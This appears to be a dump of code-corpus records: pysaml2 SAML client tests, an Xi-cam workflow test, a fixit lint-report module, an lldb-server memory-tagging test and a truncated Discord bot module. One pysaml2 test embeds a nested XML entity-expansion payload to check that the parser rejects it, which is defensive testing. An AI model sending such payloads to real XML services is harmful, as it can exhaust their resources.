qs = parse_qs(qs)
assert _leq(qs.keys(),
['SigAlg', 'SAMLRequest', 'RelayState', 'Signature'])
assert verify_redirect_signature(list_values2simpletons(qs),
client.sec.sec_backend)
res = self.server.parse_logout_request(qs["SAMLRequest"][0],
BINDING_HTTP_REDIRECT)
def test_do_logout_post(self):
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": in_a_while(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
},
"session_index": SessionIndex("_foo")
}
self.client.users.add_information_about_person(session_info)
entity_ids = self.client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = self.client.do_logout(nid, entity_ids, "Tired",
in_a_while(minutes=5), sign=True,
expected_binding=BINDING_HTTP_POST)
assert resp
assert len(resp) == 1
assert list(resp.keys()) == entity_ids
binding, info = resp[entity_ids[0]]
assert binding == BINDING_HTTP_POST
_dic = unpack_form(info["data"])
res = self.server.parse_logout_request(_dic["SAMLRequest"],
BINDING_HTTP_POST)
assert b'<ns0:SessionIndex>_foo</ns0:SessionIndex>' in res.xmlstr
def test_do_logout_session_expired(self):
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": a_while_ago(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
},
"session_index": SessionIndex("_foo")
}
self.client.users.add_information_about_person(session_info)
entity_ids = self.client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = self.client.do_logout(nid, entity_ids, "Tired",
in_a_while(minutes=5), sign=True,
expected_binding=BINDING_HTTP_POST)
assert resp
assert len(resp) == 1
assert list(resp.keys()) == entity_ids
binding, info = resp[entity_ids[0]]
assert binding == BINDING_HTTP_POST
_dic = unpack_form(info["data"])
res = self.server.parse_logout_request(_dic["SAMLRequest"],
BINDING_HTTP_POST)
assert b'<ns0:SessionIndex>_foo</ns0:SessionIndex>' in res.xmlstr
# Below can only be done with dummy Server
IDP = "urn:mace:example.com:saml:roland:idp"
class TestClientWithDummy():
def setup_class(self):
self.server = FakeIDP("idp_all_conf")
conf = config.SPConfig()
conf.load_file("servera_conf")
self.client = Saml2Client(conf)
self.client.send = self.server.receive
def test_do_authn(self):
binding = BINDING_HTTP_REDIRECT
response_binding = BINDING_HTTP_POST
sid, http_args = self.client.prepare_for_authenticate(
IDP, "http://www.example.com/relay_state",
binding=binding, response_binding=response_binding)
assert isinstance(sid, six.string_types)
assert len(http_args) == 4
assert http_args["headers"][0][0] == "Location"
assert http_args["data"] == []
redirect_url = http_args["headers"][0][1]
_, _, _, _, qs, _ = urlparse(redirect_url)
qs_dict = parse_qs(qs)
req = self.server.parse_authn_request(qs_dict["SAMLRequest"][0],
binding)
resp_args = self.server.response_args(req.message, [response_binding])
assert resp_args["binding"] == response_binding
def test_do_negotiated_authn(self):
binding = BINDING_HTTP_REDIRECT
response_binding = BINDING_HTTP_POST
sid, auth_binding, http_args = \
self.client.prepare_for_negotiated_authenticate(
IDP, "http://www.example.com/relay_state",
binding=binding, response_binding=response_binding)
assert binding == auth_binding
assert isinstance(sid, six.string_types)
assert len(http_args) == 4
assert http_args["headers"][0][0] == "Location"
assert http_args["data"] == []
redirect_url = http_args["headers"][0][1]
_, _, _, _, qs, _ = urlparse(redirect_url)
qs_dict = parse_qs(qs)
req = self.server.parse_authn_request(qs_dict["SAMLRequest"][0],
binding)
resp_args = self.server.response_args(req.message, [response_binding])
assert resp_args["binding"] == response_binding
def test_do_attribute_query(self):
response = self.client.do_attribute_query(
IDP, "_e7b68a04488f715cda642fbdd90099f5",
attribute={"eduPersonAffiliation": None},
nameid_format=NAMEID_FORMAT_TRANSIENT)
def test_logout_1(self):
""" one IdP/AA logout from"""
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": in_a_while(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
}
}
self.client.users.add_information_about_person(session_info)
entity_ids = self.client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = self.client.global_logout(nid, "Tired", in_a_while(minutes=5))
assert resp
assert len(resp) == 1
assert list(resp.keys()) == entity_ids
response = resp[entity_ids[0]]
assert isinstance(response, LogoutResponse)
assert response.return_addrs
assert len(response.return_addrs) == 1
def test_post_sso(self):
binding = BINDING_HTTP_POST
response_binding = BINDING_HTTP_POST
sid, http_args = self.client.prepare_for_authenticate(
"urn:mace:example.com:saml:roland:idp", relay_state="really",
binding=binding, response_binding=response_binding)
_dic = unpack_form(http_args["data"])
req = self.server.parse_authn_request(_dic["SAMLRequest"], binding)
resp_args = self.server.response_args(req.message, [response_binding])
assert resp_args["binding"] == response_binding
# Normally a response would now be sent back to the users web client
# Here I fake what the client will do
# create the form post
http_args["data"] = urlencode(_dic)
http_args["method"] = "POST"
http_args["dummy"] = _dic["SAMLRequest"]
http_args["headers"] = [('Content-type',
'application/x-www-form-urlencoded')]
response = self.client.send(**http_args)
_dic = unpack_form(response.text, "SAMLResponse")
# Explicitly allow unsigned responses for this test
self.client.want_response_signed = False
resp = self.client.parse_authn_request_response(_dic["SAMLResponse"],
BINDING_HTTP_POST,
{sid: "/"})
ac = resp.assertion.authn_statement[0].authn_context
assert ac.authenticating_authority[0].text == \
'http://www.example.com/login'
assert ac.authn_context_class_ref.text == INTERNETPROTOCOLPASSWORD
def test_negotiated_post_sso(self):
binding = BINDING_HTTP_POST
response_binding = BINDING_HTTP_POST
sid, auth_binding, http_args = self.client.prepare_for_negotiated_authenticate(
"urn:mace:example.com:saml:roland:idp", relay_state="really",
binding=binding, response_binding=response_binding)
_dic = unpack_form(http_args["data"])
assert binding == auth_binding
req = self.server.parse_authn_request(_dic["SAMLRequest"], binding)
resp_args = self.server.response_args(req.message, [response_binding])
assert resp_args["binding"] == response_binding
# Normally a response would now be sent back to the users web client
# Here I fake what the client will do
# create the form post
http_args["data"] = urlencode(_dic)
http_args["method"] = "POST"
http_args["dummy"] = _dic["SAMLRequest"]
http_args["headers"] = [('Content-type',
'application/x-www-form-urlencoded')]
response = self.client.send(**http_args)
_dic = unpack_form(response.text, "SAMLResponse")
resp = self.client.parse_authn_request_response(_dic["SAMLResponse"],
BINDING_HTTP_POST,
{sid: "/"})
ac = resp.assertion.authn_statement[0].authn_context
assert ac.authenticating_authority[0].text == \
'http://www.example.com/login'
assert ac.authn_context_class_ref.text == INTERNETPROTOCOLPASSWORD
class TestClientNoConfigContext():
def setup_class(self):
self.server = FakeIDP("idp_all_conf")
conf = config.Config() # not SPConfig
conf.load_file("servera_conf")
self.client = Saml2Client(conf)
self.client.send = self.server.receive
def test_logout_1(self):
""" one IdP/AA logout from"""
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": in_a_while(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
}
}
self.client.users.add_information_about_person(session_info)
entity_ids = self.client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = self.client.global_logout(nid, "Tired", in_a_while(minutes=5))
assert resp
assert len(resp) == 1
assert list(resp.keys()) == entity_ids
response = resp[entity_ids[0]]
assert isinstance(response, LogoutResponse)
assert response.return_addrs
assert len(response.return_addrs) == 1
def test_parse_soap_enveloped_saml_xxe():
xml = """<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
]>
<lolz>&lol1;</lolz>
"""
with raises(EntitiesForbidden):
parse_soap_enveloped_saml(xml, None)
if __name__ == "__main__":
tc = TestClient()
tc.setup_class()
tc.test_sign_then_encrypt_assertion()
| en | 0.61638 | #!/usr/bin/env python # -*- coding: utf-8 -*- # Sometimes we get an xml header, sometimes we don't. # Check name_format ?? <?xml version='1.0' encoding='UTF-8'?> <ns0:AttributeQuery Destination="https://idp.example.com/idp/" ID="id1" IssueInstant="%s" Version="2.0" xmlns:ns0="urn:oasis:names:tc:SAML:2 .0:protocol"><ns1:Issuer Format="urn:oasis:names:tc:SAML:2 .0:nameid-format:entity" xmlns:ns1="urn:oasis:names:tc:SAML:2 .0:assertion">urn:mace:example.com:saml:roland:sp</ns1:Issuer><ns1:Subject xmlns:ns1="urn:oasis:names:tc:SAML:2.0:assertion"><ns1:NameID Format="urn:oasis:names:tc:SAML:2 .0:nameid-format:persistent">E8042FB4-4D5B-48C3-8E14-8EDD852790DD</ns1:NameID ></ns1:Subject></ns0:AttributeQuery> <?xml version='1.0' encoding='UTF-8'?> <ns0:AttributeQuery xmlns:ns0="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:ns1="urn:oasis:names:tc:SAML:2.0:assertion" Destination="https://idp .example.com/idp/" ID="id1" IssueInstant="%s" Version="2.0"><ns1:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">urn:mace:example .com:saml:roland:sp</ns1:Issuer><ns1:Subject><ns1:NameID Format="urn:oasis:names:tc:SAML:2 .0:nameid-format:persistent">E8042FB4-4D5B-48C3-8E14-8EDD852790DD</ns1:NameID ></ns1:Subject></ns0:AttributeQuery> # one is givenName # vo # missing certificate # One person in the cache # The information I have about the subject comes from one source # --- authenticate another person # Two persons in the cache # The information I have about the subjects comes from the same source # One person in the cache # The information I have about the subject comes from one source # Begin with the IdPs side # Create an Assertion instance from the signed assertion #www.example.com", # Now over to the client side # Begin with the IdPs side # strangely enough I get different tags if I run this test separately # or as part of a bunch of tests. # seresp = samlp.response_from_string(enctext) # Now over to the client side # Explicitely allow unsigned responses for this and the following 2 tests # assert resp.encrypted_assertion == [] # Begin with the IdPs side # xmldoc = "%s" % response # strangely enough I get different tags if I run this test separately # or as part of a bunch of tests. # xmldoc = add_subelement(xmldoc, "EncryptedAssertion", sigass) # seresp = samlp.response_from_string(enctext) # Now over to the client side # assert resp.encrypted_assertion == [] # Begin with the IdPs side # seresp = samlp.response_from_string(enctext) # Now over to the client side # assert resp.encrypted_assertion == [] # Revert configuration change to disallow unsinged responses # information about the user from an IdP # information about the user from an IdP # information about the user from an IdP # Below can only be done with dummy Server one IdP/AA logout from # information about the user from an IdP # Normally a response would now be sent back to the users web client # Here I fake what the client will do # create the form post # Explicitly allow unsigned responses for this test # Normally a response would now be sent back to the users web client # Here I fake what the client will do # create the form post # not SPConfig one IdP/AA logout from # information about the user from an IdP <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> ]> <lolz>&lol1;</lolz> | 1.429538 | 1 |
xicam/SAXS/tests/test_workflows.py | ihumphrey/Xi-cam.SAXS | 1 | 6632454 | <filename>xicam/SAXS/tests/test_workflows.py
from collections import namedtuple
import fabio
import numpy as np
from pyFAI import detectors, calibrant
from pyFAI.azimuthalIntegrator import AzimuthalIntegrator
import pytest
from xicam.core import execution
from xicam.core.execution import localexecutor
from xicam.SAXS.calibration.workflows import FourierCalibrationWorkflow
from xicam.SAXS.workflows.xpcs import OneTime, TwoTime
execution.executor = localexecutor.LocalExecutor()
def test_FourierCalibrationWorkflow():
workflow = FourierCalibrationWorkflow()
data = fabio.open('/home/rp/data/YL1031/AGB_5S_USE_2_2m.edf').data
ai = AzimuthalIntegrator()
ai.set_wavelength(124e-12)
ai.detector = detectors.Pilatus2M()
c = calibrant.ALL_CALIBRANTS('AgBh')
print(workflow.execute(None, data=data, ai=ai, calibrant=c, callback_slot=print))
FRAMES = 100
SHAPE = (10, 10)
@pytest.fixture
def images():
return np.random.random((FRAMES, *SHAPE))
@pytest.fixture
def labels():
return np.ones(SHAPE)
class TestOneTimeWorkflow:
def test_no_darks(self, images, labels):
workflow = TwoTime()
workflow.execute_synchronous(images=images, labels=labels)
# TODO should dark correction be required?
def test_with_darks(self):
workflow = TwoTime()
workflow.execute_synchronous(images=images,
labels=labels,
darks=None,
flats=None)
class TestTwoTimeWorkflow:
def test_no_darks(self, images, labels):
workflow = TwoTime()
result = workflow.execute_synchronous(images=images,
labels=labels)
print(result)
def test_with_darks(self):
... | <filename>xicam/SAXS/tests/test_workflows.py
from collections import namedtuple
import fabio
import numpy as np
from pyFAI import detectors, calibrant
from pyFAI.azimuthalIntegrator import AzimuthalIntegrator
import pytest
from xicam.core import execution
from xicam.core.execution import localexecutor
from xicam.SAXS.calibration.workflows import FourierCalibrationWorkflow
from xicam.SAXS.workflows.xpcs import OneTime, TwoTime
execution.executor = localexecutor.LocalExecutor()
def test_FourierCalibrationWorkflow():
workflow = FourierCalibrationWorkflow()
data = fabio.open('/home/rp/data/YL1031/AGB_5S_USE_2_2m.edf').data
ai = AzimuthalIntegrator()
ai.set_wavelength(124e-12)
ai.detector = detectors.Pilatus2M()
c = calibrant.ALL_CALIBRANTS('AgBh')
print(workflow.execute(None, data=data, ai=ai, calibrant=c, callback_slot=print))
FRAMES = 100
SHAPE = (10, 10)
@pytest.fixture
def images():
return np.random.random((FRAMES, *SHAPE))
@pytest.fixture
def labels():
return np.ones(SHAPE)
class TestOneTimeWorkflow:
def test_no_darks(self, images, labels):
workflow = TwoTime()
workflow.execute_synchronous(images=images, labels=labels)
# TODO should dark correction be required?
def test_with_darks(self):
workflow = TwoTime()
workflow.execute_synchronous(images=images,
labels=labels,
darks=None,
flats=None)
class TestTwoTimeWorkflow:
def test_no_darks(self, images, labels):
workflow = TwoTime()
result = workflow.execute_synchronous(images=images,
labels=labels)
print(result)
def test_with_darks(self):
... | en | 0.829431 | # TODO should dark correction be required? | 2.152318 | 2 |
fixit/common/report.py | Instagram/Fix | 0 | 6632455 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import abc
import ast
from pathlib import Path
from pickle import PicklingError
from typing import Collection, Optional, Sequence, Union
import libcst as cst
from fixit.common.autofix import LintPatch
class BaseLintRuleReport(abc.ABC):
"""
Represents a lint violation. This is generated by calling `self.context.report`
in your lint rule, and is saved to the context's `reports` list.
"""
file_path: Path
code: str
message: str
# This is the line/column where the lint rule reported the violation. `arc lint` may
# report a different line/column when a patch is applied because it requires that
# the start of the patch is the same as the reported line/column.
line: int
column: int
def __init__(
self, *, file_path: Path, code: str, message: str, line: int, column: int
) -> None:
self.file_path = file_path
self.code = code
self.message = message
self.line = line
self.column = column
@property
def patch(self) -> Optional[LintPatch]:
return None
def __repr__(self) -> str:
return f"{self.line}:{self.column}: {self.code} {self.message}"
def __reduce__(self) -> None:
raise PicklingError(
"Lint rule reports are potentially very complex objects. They can contain "
+ "a syntax tree or an entire module's source code. They should not be "
+ "pickled (or returned by a multiprocessing worker). Instead, extract "
+ "the fields you care about, and pickle those."
)
class AstLintRuleReport(BaseLintRuleReport):
def __init__(
self,
*,
file_path: Path,
node: ast.AST,
code: str,
message: str,
line: int,
column: int,
) -> None:
super().__init__(
file_path=file_path, code=code, message=message, line=line, column=column
)
self.node = node
class CstLintRuleReport(BaseLintRuleReport):
def __init__(
self,
*,
file_path: Path,
node: cst.CSTNode,
code: str,
message: str,
line: int,
column: int,
module: cst.MetadataWrapper,
module_bytes: bytes,
replacement_node: Optional[
Union[cst.CSTNode, cst.FlattenSentinel, cst.RemovalSentinel]
] = None,
) -> None:
super().__init__(
file_path=file_path, code=code, message=message, line=line, column=column
)
self.node = node
self.module = module
self.module_bytes = module_bytes
self.replacement_node = replacement_node
self._cached_patch: Optional[LintPatch] = None
# Ideally this would use functools.cached_property, but that's only in py3.8+.
@property
def patch(self) -> Optional[LintPatch]:
"""
Computes and returns a `LintPatch` object.
"""
replacement_node = self.replacement_node
if replacement_node is None:
return None
cached = self._cached_patch
if cached is None:
cached = LintPatch.get(
wrapper=self.module,
original_node=self.node,
replacement_node=replacement_node,
).minimize()
self._cached_patch = cached
return cached
class LintFailureReportBase(abc.ABC):
"""An implementation needs to be a dataclass."""
@staticmethod
@abc.abstractmethod
def create_reports(
path: Path, exception_traceback: str, **kwargs: object
) -> Sequence["LintFailureReportBase"]:
...
class LintSuccessReportBase(abc.ABC):
"""An implementation needs to be a dataclass."""
@staticmethod
@abc.abstractmethod
def create_reports(
path: Path, reports: Collection[BaseLintRuleReport], **kwargs: object
) -> Sequence["LintSuccessReportBase"]:
...
| # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import abc
import ast
from pathlib import Path
from pickle import PicklingError
from typing import Collection, Optional, Sequence, Union
import libcst as cst
from fixit.common.autofix import LintPatch
class BaseLintRuleReport(abc.ABC):
"""
Represents a lint violation. This is generated by calling `self.context.report`
in your lint rule, and is saved to the context's `reports` list.
"""
file_path: Path
code: str
message: str
# This is the line/column where the lint rule reported the violation. `arc lint` may
# report a different line/column when a patch is applied because it requires that
# the start of the patch is the same as the reported line/column.
line: int
column: int
def __init__(
self, *, file_path: Path, code: str, message: str, line: int, column: int
) -> None:
self.file_path = file_path
self.code = code
self.message = message
self.line = line
self.column = column
@property
def patch(self) -> Optional[LintPatch]:
return None
def __repr__(self) -> str:
return f"{self.line}:{self.column}: {self.code} {self.message}"
def __reduce__(self) -> None:
raise PicklingError(
"Lint rule reports are potentially very complex objects. They can contain "
+ "a syntax tree or an entire module's source code. They should not be "
+ "pickled (or returned by a multiprocessing worker). Instead, extract "
+ "the fields you care about, and pickle those."
)
class AstLintRuleReport(BaseLintRuleReport):
def __init__(
self,
*,
file_path: Path,
node: ast.AST,
code: str,
message: str,
line: int,
column: int,
) -> None:
super().__init__(
file_path=file_path, code=code, message=message, line=line, column=column
)
self.node = node
class CstLintRuleReport(BaseLintRuleReport):
def __init__(
self,
*,
file_path: Path,
node: cst.CSTNode,
code: str,
message: str,
line: int,
column: int,
module: cst.MetadataWrapper,
module_bytes: bytes,
replacement_node: Optional[
Union[cst.CSTNode, cst.FlattenSentinel, cst.RemovalSentinel]
] = None,
) -> None:
super().__init__(
file_path=file_path, code=code, message=message, line=line, column=column
)
self.node = node
self.module = module
self.module_bytes = module_bytes
self.replacement_node = replacement_node
self._cached_patch: Optional[LintPatch] = None
# Ideally this would use functools.cached_property, but that's only in py3.8+.
@property
def patch(self) -> Optional[LintPatch]:
"""
Computes and returns a `LintPatch` object.
"""
replacement_node = self.replacement_node
if replacement_node is None:
return None
cached = self._cached_patch
if cached is None:
cached = LintPatch.get(
wrapper=self.module,
original_node=self.node,
replacement_node=replacement_node,
).minimize()
self._cached_patch = cached
return cached
class LintFailureReportBase(abc.ABC):
"""An implementation needs to be a dataclass."""
@staticmethod
@abc.abstractmethod
def create_reports(
path: Path, exception_traceback: str, **kwargs: object
) -> Sequence["LintFailureReportBase"]:
...
class LintSuccessReportBase(abc.ABC):
"""An implementation needs to be a dataclass."""
@staticmethod
@abc.abstractmethod
def create_reports(
path: Path, reports: Collection[BaseLintRuleReport], **kwargs: object
) -> Sequence["LintSuccessReportBase"]:
...
| en | 0.914426 | # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. Represents a lint violation. This is generated by calling `self.context.report` in your lint rule, and is saved to the context's `reports` list. # This is the line/column where the lint rule reported the violation. `arc lint` may # report a different line/column when a patch is applied because it requires that # the start of the patch is the same as the reported line/column. # Ideally this would use functools.cached_property, but that's only in py3.8+. Computes and returns a `LintPatch` object. An implementation needs to be a dataclass. An implementation needs to be a dataclass. | 2.453962 | 2 |
lldb/test/API/tools/lldb-server/memory-tagging/TestGdbRemoteMemoryTagging.py | acidburn0zzz/llvm-project | 2 | 6632456 | <filename>lldb/test/API/tools/lldb-server/memory-tagging/TestGdbRemoteMemoryTagging.py
import gdbremote_testcase
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestGdbRemoteMemoryTagging(gdbremote_testcase.GdbRemoteTestCaseBase):
mydir = TestBase.compute_mydir(__file__)
def check_qmemtags_response(self, body, expected):
self.test_sequence.add_log_lines(["read packet: $qMemTags:{}#00".format(body),
"send packet: ${}#00".format(expected),
],
True)
self.expect_gdbremote_sequence()
@skipUnlessArch("aarch64")
@skipUnlessPlatform(["linux"])
@skipUnlessAArch64MTELinuxCompiler
def test_qmemtags_packets(self):
""" Test that qMemTags packets are parsed correctly and/or rejected. """
self.build()
self.set_inferior_startup_launch()
procs = self.prep_debug_monitor_and_inferior()
# Run the process
self.test_sequence.add_log_lines(
[
# Start running after initial stop
"read packet: $c#63",
# Match the address of the MTE page
{"type": "output_match",
"regex": self.maybe_strict_output_regex(r"buffer: (.+) page_size: (.+)\r\n"),
"capture": {1: "buffer", 2: "page_size"}},
# Now stop the inferior
"read packet: {}".format(chr(3)),
# And wait for the stop notification
{"direction": "send", "regex": r"^\$T[0-9a-fA-F]{2}thread:[0-9a-fA-F]+;"}],
True)
# Run the packet stream
context = self.expect_gdbremote_sequence()
self.assertIsNotNone(context)
buf_address = context.get("buffer")
self.assertIsNotNone(buf_address)
page_size = context.get("page_size")
self.assertIsNotNone(page_size)
# nil means we couldn't set up a tagged page because the
# target doesn't support it.
if buf_address == "(nil)":
self.skipTest("Target must support MTE.")
buf_address = int(buf_address, 16)
page_size = int(page_size, 16)
# In the tests below E03 means the packet wasn't formed correctly
# and E01 means it was but we had some other error acting upon it.
# Sanity check that address is correct
self.check_qmemtags_response("{:x},20:1".format(buf_address), "m0001")
# Invalid packets
# No content
self.check_qmemtags_response("", "E03")
# Only address
self.check_qmemtags_response("{:x}".format(buf_address), "E03")
# Only address and length
self.check_qmemtags_response("{:x},20".format(buf_address), "E03")
# Empty address
self.check_qmemtags_response(",20:1", "E03")
# Invalid addresses
self.check_qmemtags_response("aardvark,20:1", "E03")
self.check_qmemtags_response("-100,20:1", "E03")
self.check_qmemtags_response("cafe?,20:1", "E03")
# Empty length
self.check_qmemtags_response("{:x},:1".format(buf_address), "E03")
# Invalid lengths
self.check_qmemtags_response("{:x},food:1".format(buf_address), "E03")
self.check_qmemtags_response("{:x},-1:1".format(buf_address), "E03")
self.check_qmemtags_response("{:x},12??:1".format(buf_address), "E03")
# Empty type
self.check_qmemtags_response("{:x},10:".format(buf_address), "E03")
# Types we don't support
self.check_qmemtags_response("{:x},10:FF".format(buf_address), "E01")
# (even if the length of the read is zero)
self.check_qmemtags_response("{:x},0:FF".format(buf_address), "E01")
self.check_qmemtags_response("{:x},10:-1".format(buf_address), "E01")
self.check_qmemtags_response("{:x},10:+20".format(buf_address), "E01")
# Invalid type format
self.check_qmemtags_response("{:x},10:cat".format(buf_address), "E03")
self.check_qmemtags_response("{:x},10:?11".format(buf_address), "E03")
# Valid packets
# Reading nothing is allowed
self.check_qmemtags_response("{:x},0:1".format(buf_address), "m")
# A range that's already aligned
self.check_qmemtags_response("{:x},20:1".format(buf_address), "m0001")
# lldb-server should re-align the range
# Here we read from 1/2 way through a granule, into the next. Expands to 2 granules
self.check_qmemtags_response("{:x},10:1".format(buf_address+64-8), "m0304")
# Read up to the end of an MTE page.
# We know that the last tag should be 0xF since page size will always be a
# multiple of 256 bytes, which is 16 granules and we have 16 tags to use.
self.check_qmemtags_response("{:x},10:1".format(buf_address+page_size-16), "m0f")
# Here we read off of the end of the MTE range so ptrace gives us one tag,
# then fails on the second call. To lldb-server this means the response
# should just be an error, not a partial read.
self.check_qmemtags_response("{:x},20:1".format(buf_address+page_size-16), "E01")
# Note that we do not test reading over a page boundary within the same
# mapping. That logic is handled in the kernel itself so it's just a single
# ptrace call for lldb-server.
| <filename>lldb/test/API/tools/lldb-server/memory-tagging/TestGdbRemoteMemoryTagging.py
import gdbremote_testcase
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestGdbRemoteMemoryTagging(gdbremote_testcase.GdbRemoteTestCaseBase):
mydir = TestBase.compute_mydir(__file__)
def check_qmemtags_response(self, body, expected):
self.test_sequence.add_log_lines(["read packet: $qMemTags:{}#00".format(body),
"send packet: ${}#00".format(expected),
],
True)
self.expect_gdbremote_sequence()
@skipUnlessArch("aarch64")
@skipUnlessPlatform(["linux"])
@skipUnlessAArch64MTELinuxCompiler
def test_qmemtags_packets(self):
""" Test that qMemTags packets are parsed correctly and/or rejected. """
self.build()
self.set_inferior_startup_launch()
procs = self.prep_debug_monitor_and_inferior()
# Run the process
self.test_sequence.add_log_lines(
[
# Start running after initial stop
"read packet: $c#63",
# Match the address of the MTE page
{"type": "output_match",
"regex": self.maybe_strict_output_regex(r"buffer: (.+) page_size: (.+)\r\n"),
"capture": {1: "buffer", 2: "page_size"}},
# Now stop the inferior
"read packet: {}".format(chr(3)),
# And wait for the stop notification
{"direction": "send", "regex": r"^\$T[0-9a-fA-F]{2}thread:[0-9a-fA-F]+;"}],
True)
# Run the packet stream
context = self.expect_gdbremote_sequence()
self.assertIsNotNone(context)
buf_address = context.get("buffer")
self.assertIsNotNone(buf_address)
page_size = context.get("page_size")
self.assertIsNotNone(page_size)
# nil means we couldn't set up a tagged page because the
# target doesn't support it.
if buf_address == "(nil)":
self.skipTest("Target must support MTE.")
buf_address = int(buf_address, 16)
page_size = int(page_size, 16)
# In the tests below E03 means the packet wasn't formed correctly
# and E01 means it was but we had some other error acting upon it.
# Sanity check that address is correct
self.check_qmemtags_response("{:x},20:1".format(buf_address), "m0001")
# Invalid packets
# No content
self.check_qmemtags_response("", "E03")
# Only address
self.check_qmemtags_response("{:x}".format(buf_address), "E03")
# Only address and length
self.check_qmemtags_response("{:x},20".format(buf_address), "E03")
# Empty address
self.check_qmemtags_response(",20:1", "E03")
# Invalid addresses
self.check_qmemtags_response("aardvark,20:1", "E03")
self.check_qmemtags_response("-100,20:1", "E03")
self.check_qmemtags_response("cafe?,20:1", "E03")
# Empty length
self.check_qmemtags_response("{:x},:1".format(buf_address), "E03")
# Invalid lengths
self.check_qmemtags_response("{:x},food:1".format(buf_address), "E03")
self.check_qmemtags_response("{:x},-1:1".format(buf_address), "E03")
self.check_qmemtags_response("{:x},12??:1".format(buf_address), "E03")
# Empty type
self.check_qmemtags_response("{:x},10:".format(buf_address), "E03")
# Types we don't support
self.check_qmemtags_response("{:x},10:FF".format(buf_address), "E01")
# (even if the length of the read is zero)
self.check_qmemtags_response("{:x},0:FF".format(buf_address), "E01")
self.check_qmemtags_response("{:x},10:-1".format(buf_address), "E01")
self.check_qmemtags_response("{:x},10:+20".format(buf_address), "E01")
# Invalid type format
self.check_qmemtags_response("{:x},10:cat".format(buf_address), "E03")
self.check_qmemtags_response("{:x},10:?11".format(buf_address), "E03")
# Valid packets
# Reading nothing is allowed
self.check_qmemtags_response("{:x},0:1".format(buf_address), "m")
# A range that's already aligned
self.check_qmemtags_response("{:x},20:1".format(buf_address), "m0001")
# lldb-server should re-align the range
# Here we read from 1/2 way through a granule, into the next. Expands to 2 granules
self.check_qmemtags_response("{:x},10:1".format(buf_address+64-8), "m0304")
# Read up to the end of an MTE page.
# We know that the last tag should be 0xF since page size will always be a
# multiple of 256 bytes, which is 16 granules and we have 16 tags to use.
self.check_qmemtags_response("{:x},10:1".format(buf_address+page_size-16), "m0f")
# Here we read off of the end of the MTE range so ptrace gives us one tag,
# then fails on the second call. To lldb-server this means the response
# should just be an error, not a partial read.
self.check_qmemtags_response("{:x},20:1".format(buf_address+page_size-16), "E01")
# Note that we do not test reading over a page boundary within the same
# mapping. That logic is handled in the kernel itself so it's just a single
# ptrace call for lldb-server.
| en | 0.886867 | #00".format(body), #00".format(expected), Test that qMemTags packets are parsed correctly and/or rejected. # Run the process # Start running after initial stop #63", # Match the address of the MTE page # Now stop the inferior # And wait for the stop notification # Run the packet stream # nil means we couldn't set up a tagged page because the # target doesn't support it. # In the tests below E03 means the packet wasn't formed correctly # and E01 means it was but we had some other error acting upon it. # Sanity check that address is correct # Invalid packets # No content # Only address # Only address and length # Empty address # Invalid addresses # Empty length # Invalid lengths # Empty type # Types we don't support # (even if the length of the read is zero) # Invalid type format # Valid packets # Reading nothing is allowed # A range that's already aligned # lldb-server should re-align the range # Here we read from 1/2 way through a granule, into the next. Expands to 2 granules # Read up to the end of an MTE page. # We know that the last tag should be 0xF since page size will always be a # multiple of 256 bytes, which is 16 granules and we have 16 tags to use. # Here we read off of the end of the MTE range so ptrace gives us one tag, # then fails on the second call. To lldb-server this means the response # should just be an error, not a partial read. # Note that we do not test reading over a page boundary within the same # mapping. That logic is handled in the kernel itself so it's just a single # ptrace call for lldb-server. | 1.971064 | 2 |
things/BOTUTL.py | BananasCanCodeToo/Acron-Discord-Bot | 3 | 6632457 | import discord
import datetime
import json
import pickle
import yaml
from discord.ext import commands, tasks
from discord import Embed, Member
from datetime import timedelta
from itertools import cycle
import things.UTILITIES as utl
async def startgame(user, code, guild, bot):
x = datetime.datetime.now()
games = utl.r_games()
game = False
# looks to see if this player already has a game
for i,e in games.items():
if i == f'{user.id}':
game = True
break
if game == False:
gChannel = utl.settings()['GAME_CHANNEL']
gameChannel = bot.get_channel(gChannel)
currentPing = x
ping = ''
if utl.ping() == True:
ping = guild.get_role(utl.settings()['SQUIRREL_ROLE']).mention
# Sends game code
e = discord.Embed(colour=discord.Color.orange(),title=f"**{code}**",description='React with 🐿️ if you joined')
e.set_footer(text=f'{user.name}#{user.discriminator}',icon_url=f'{user.avatar_url}')
